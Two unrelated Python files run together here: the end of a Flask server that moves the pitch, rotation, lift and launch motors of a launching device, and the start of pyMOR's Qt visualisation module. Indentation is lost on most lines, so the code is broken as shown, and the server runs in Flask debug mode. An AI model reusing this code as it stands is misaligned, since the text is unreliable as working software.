rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
rc.ForwardM2(address_2,0)
return (''), 204
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
encoders_ready = 1 #Encoders have been reset
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/app_stop', methods=['POST'])
def function_stop():
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
rc.ForwardM2(address_2,0)
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
print ('STANDBY MODE')
colorWipe(strip, Color(255, 255, 255))
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
if rotation_ready == 0:
rotation_objective = 0
else:
rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
print ('READY TO LAUNCH MODE')
colorWipe(strip, Color(255, 0, 0))
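    #Launch sequence: return the belt to launch_bottom, creep forward by
    #launch_connect at the slow speed until the belt touches the upper part, then
    #accelerate towards launch_break at the configured launch speed and acceleration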
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_break
launch_actual = launch_connect
launch_increment = launch_objective-launch_actual
rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_mount', methods=['POST'])
def function_mount():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
return (''), 204
# Automatic launch works, but it is disabled because the while loops prevent
# the motors from stopping when the Stop button is pressed, making it dangerous
##@app.route('/app_automatic_launch', methods=['POST'])
##def function_automatic_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
##
## #Prepare
## if pitch_ready == 0:
## pitch_objective = 0
## else:
## pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## if lift_ready == 0:
## lift_objective = 0
## else:
## lift_objective = int(lift_pulses/(lift_length/lift_ready))
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_1 = (0,0,0)
## buffer_2 = (0,0,0)
## while(buffer_1[1]!=0x80): #Loop until pitch is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_1[2]!=0x80): #Loop until rotation is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_2[1]!=0x80): #Loop until lift is completed
## buffer_2 = rc.ReadBuffers(address_2)
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Launch
## launch_objective = launch_break
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## rc.SpeedDistanceM2(address_2,launch_speed_pulses,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Standby
## pitch_objective = 0
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## lift_objective = 0
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## return (''), 204
@app.route('/app_change_pitch', methods=['POST'])
def function_change_pitch():
pitch_position_prepare = request.form.get('pitch_position_prepare', type=int)
if pitch_position_prepare > pitch_length or pitch_position_prepare < 0:
return (''), 400
global pitch_ready
pitch_ready = float(pitch_position_prepare)
return (''), 204
@app.route('/app_change_lift', methods=['POST'])
def function_change_lift():
lift_position_prepare = request.form.get('lift_position_prepare', type=int)
if lift_position_prepare > lift_length or lift_position_prepare < 0:
return (''), 400
global lift_ready
lift_ready = float(lift_position_prepare)
return (''), 204
@app.route('/app_change_rotation', methods=['POST'])
def function_change_rotation():
rotation_position_prepare = request.form.get('rotation_position_prepare', type=int)
if rotation_position_prepare > rotation_length or rotation_position_prepare < 0:
return (''), 400
global rotation_ready
rotation_ready = float(rotation_position_prepare)
return (''), 204
@app.route('/app_change_speed', methods=['POST'])
def function_change_speed():
speed = request.form.get('speed', type=int)
if speed > launch_max_speed or speed < launch_min_speed:
return (''), 400
global launch_speed_pulses
global launch_acceleration
    launch_speed_pulses = speed*13400
    if speed > 7:
        launch_acceleration = 655360 #Maximum value
    else:
        launch_acceleration = (launch_speed_pulses**2)/13400
    return (''), 204
@app.route('/app_change_acceleration', methods=['POST'])
def function_change_acceleration():
acceleration = request.form.get('acceleration', type=int)
if acceleration > launch_max_acceleration or acceleration < launch_min_acceleration:
return (''), 400
acceleration = acceleration*13400
global launch_acceleration
launch_acceleration = acceleration
return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
if __name__ == "__main__":
try:
        # Deploying main program for the lights:
        # Initialize the library (must be called once before other functions).
        print("Starting thermo.read_loop thread")
        threading.Thread(target = thermo.read_loop, daemon = False).start()
        print("thermo.read_loop thread started")
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
strip.begin()
print ('STANDBY MODE')
colorWipe(strip, Color(255, 255, 255)) # White wipe
#app.run(host=host,port=port) #starting the server for the webinterface
app.run('localhost',port=5000, debug=True)
#app.run(debug=True)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
|
qt.py
|
# This file is part of the pyMOR project (http://www.pymor.org).
# Copyright 2013-2020 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (http://opensource.org/licenses/BSD-2-Clause)
""" This module provides a few methods and classes for visualizing data
associated to grids. We use the `Qt <http://www.qt-project.org>`_ widget
toolkit for the GUI.
"""
import math as m
import numpy as np
import multiprocessing
from pymor.core.config import config
from pymor.core.config import is_windows_platform
from pymor.core.defaults import defaults
from pymor.core.logger import getLogger
from pymor.core.exceptions import QtMissing
from pymor.discretizers.builtin.grids.vtkio import write_vtk
from pymor.discretizers.builtin.gui.gl import GLPatchWidget, ColorBarWidget
from pymor.discretizers.builtin.gui.matplotlib import Matplotlib1DWidget, MatplotlibPatchWidget
from pymor.vectorarrays.interface import VectorArray
from pymor.vectorarrays.numpy import NumpyVectorSpace
if config.HAVE_QT:
from Qt.QtWidgets import (QWidget, QVBoxLayout, QHBoxLayout, QGridLayout, QSlider, QApplication, QLCDNumber,
QAction, QStyle, QToolBar, QLabel, QFileDialog, QMessageBox)
from Qt.QtCore import Qt, QCoreApplication, QTimer, Slot
class PlotMainWindow(QWidget):
"""Base class for plot main windows."""
def __init__(self, U, plot, length=1, title=None):
super().__init__()
layout = QVBoxLayout()
if title:
title = QLabel('<b>' + title + '</b>')
title.setAlignment(Qt.AlignHCenter)
layout.addWidget(title)
layout.addWidget(plot)
plot.set(U, 0)
if length > 1:
hlayout = QHBoxLayout()
self.slider = QSlider(Qt.Horizontal)
self.slider.setMinimum(0)
self.slider.setMaximum(length - 1)
self.slider.setTickPosition(QSlider.TicksBelow)
hlayout.addWidget(self.slider)
lcd = QLCDNumber(m.ceil(m.log10(length)))
lcd.setDecMode()
lcd.setSegmentStyle(QLCDNumber.Flat)
hlayout.addWidget(lcd)
layout.addLayout(hlayout)
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_play = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), 'Play', self)
self.a_play.setCheckable(True)
self.a_rewind = QAction(self.style().standardIcon(QStyle.SP_MediaSeekBackward), 'Rewind', self)
self.a_toend = QAction(self.style().standardIcon(QStyle.SP_MediaSeekForward), 'End', self)
self.a_step_backward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipBackward),
'Step Back', self)
self.a_step_forward = QAction(self.style().standardIcon(QStyle.SP_MediaSkipForward), 'Step', self)
self.a_loop = QAction(self.style().standardIcon(QStyle.SP_BrowserReload), 'Loop', self)
self.a_loop.setCheckable(True)
toolbar.addAction(self.a_play)
toolbar.addAction(self.a_rewind)
toolbar.addAction(self.a_toend)
toolbar.addAction(self.a_step_backward)
toolbar.addAction(self.a_step_forward)
toolbar.addAction(self.a_loop)
if hasattr(self, 'save'):
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
self.a_save.triggered.connect(self.save)
hlayout.addWidget(toolbar)
self.speed = QSlider(Qt.Horizontal)
self.speed.setMinimum(0)
self.speed.setMaximum(100)
hlayout.addWidget(QLabel('Speed:'))
hlayout.addWidget(self.speed)
layout.addLayout(hlayout)
self.timer = QTimer()
self.timer.timeout.connect(self.update_solution)
self.slider.valueChanged.connect(self.slider_changed)
self.slider.valueChanged.connect(lcd.display)
self.speed.valueChanged.connect(self.speed_changed)
self.a_play.toggled.connect(self.toggle_play)
self.a_rewind.triggered.connect(self.rewind)
self.a_toend.triggered.connect(self.to_end)
self.a_step_forward.triggered.connect(self.step_forward)
self.a_step_backward.triggered.connect(self.step_backward)
self.speed.setValue(50)
elif hasattr(self, 'save'):
hlayout = QHBoxLayout()
toolbar = QToolBar()
self.a_save = QAction(self.style().standardIcon(QStyle.SP_DialogSaveButton), 'Save', self)
toolbar.addAction(self.a_save)
hlayout.addWidget(toolbar)
layout.addLayout(hlayout)
self.a_save.triggered.connect(self.save)
self.setLayout(layout)
self.plot = plot
self.U = U
self.length = length
def slider_changed(self, ind):
self.plot.set(self.U, ind)
def speed_changed(self, val):
self.timer.setInterval(val * 20)
def update_solution(self):
ind = self.slider.value() + 1
if ind >= self.length:
if self.a_loop.isChecked():
ind = 0
else:
self.a_play.setChecked(False)
return
self.slider.setValue(ind)
def toggle_play(self, checked):
if checked:
if self.slider.value() + 1 == self.length:
self.slider.setValue(0)
self.timer.start()
else:
self.timer.stop()
def rewind(self):
self.slider.setValue(0)
def to_end(self):
self.a_play.setChecked(False)
self.slider.setValue(self.length - 1)
def step_forward(self):
self.a_play.setChecked(False)
ind = self.slider.value() + 1
if ind == self.length and self.a_loop.isChecked():
ind = 0
if ind < self.length:
self.slider.setValue(ind)
def step_backward(self):
self.a_play.setChecked(False)
ind = self.slider.value() - 1
if ind == -1 and self.a_loop.isChecked():
ind = self.length - 1
if ind >= 0:
self.slider.setValue(ind)
_launch_qt_processes = set()
def _launch_qt_app(main_window_factory, block):
"""Wrapper to display plot in a separate process."""
def _doit(factory):
try:
app = QApplication([])
except RuntimeError:
app = QCoreApplication.instance()
main_window = factory()
if getattr(sys, '_called_from_test', False) and is_windows_platform():
QTimer.singleShot(500, app, Slot('quit()'))
main_window.show()
app.exec_()
import sys
if (block and not getattr(sys, '_called_from_test', False)) or is_windows_platform():
_doit(main_window_factory)
else:
p = multiprocessing.Process(target=_doit, args=(main_window_factory,))
p.start()
_launch_qt_processes.add(p.pid)
def stop_gui_processes():
import os, signal
kill_procs = {p for p in multiprocessing.active_children() if p.pid in _launch_qt_processes}
for p in kill_procs:
# active_children apparently contains false positives sometimes
p.terminate()
p.join(1)
for p in kill_procs:
if p.is_alive():
os.kill(p.pid, signal.SIGKILL)
@defaults('backend')
def visualize_patch(grid, U, bounding_box=([0, 0], [1, 1]), codim=2, title=None, legend=None,
separate_colorbars=False, rescale_colorbars=False, backend='gl', block=False, columns=2):
"""Visualize scalar data associated to a two-dimensional |Grid| as a patch plot.
The grid's |ReferenceElement| must be the triangle or square. The data can either
be attached to the faces or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
bounding_box
A bounding box in which the grid is contained.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 2).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
backend
Plot backend to use ('gl' or 'matplotlib').
block
If `True`, block execution until the plot window is closed.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
if not config.HAVE_QT:
raise QtMissing()
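    # Usage sketch, assuming `g` is a two-dimensional pyMOR grid and `U` a
    # |VectorArray| of matching data built elsewhere:
    #     visualize_patch(g, U, codim=2, title='solution', backend='matplotlib')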
assert backend in {'gl', 'matplotlib'}
if backend == 'gl':
if not config.HAVE_GL:
logger = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
logger.warning('import of PyOpenGL failed, falling back to matplotlib; rendering will be slow')
backend = 'matplotlib'
elif not config.HAVE_QTOPENGL:
logger = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
logger.warning('import of Qt.QtOpenGL failed, falling back to matplotlib; rendering will be slow')
backend = 'matplotlib'
if backend == 'matplotlib' and not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
else:
if not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
# TODO extract class
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, bounding_box, codim, title, legend, separate_colorbars, rescale_colorbars, backend):
assert isinstance(U, VectorArray) \
or (isinstance(U, tuple) and all(isinstance(u, VectorArray) for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.to_numpy().astype(np.float64, copy=False),) if isinstance(U, VectorArray) else \
tuple(u.to_numpy().astype(np.float64, copy=False) for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
if backend == 'gl':
widget = GLPatchWidget
cbar_widget = ColorBarWidget
else:
widget = MatplotlibPatchWidget
cbar_widget = None
if not separate_colorbars and len(U) > 1:
l = getLogger('pymor.discretizers.builtin.gui.qt.visualize_patch')
l.warning('separate_colorbars=False not supported for matplotlib backend')
separate_colorbars = True
class PlotWidget(QWidget):
def __init__(self):
super().__init__()
if separate_colorbars:
if rescale_colorbars:
self.vmins = tuple(np.min(u[0]) for u in U)
self.vmaxs = tuple(np.max(u[0]) for u in U)
else:
self.vmins = tuple(np.min(u) for u in U)
self.vmaxs = tuple(np.max(u) for u in U)
else:
if rescale_colorbars:
self.vmins = (min(np.min(u[0]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[0]) for u in U),) * len(U)
else:
self.vmins = (min(np.min(u) for u in U),) * len(U)
self.vmaxs = (max(np.max(u) for u in U),) * len(U)
layout = QHBoxLayout()
plot_layout = QGridLayout()
self.colorbarwidgets = [cbar_widget(self, vmin=vmin, vmax=vmax) if cbar_widget else None
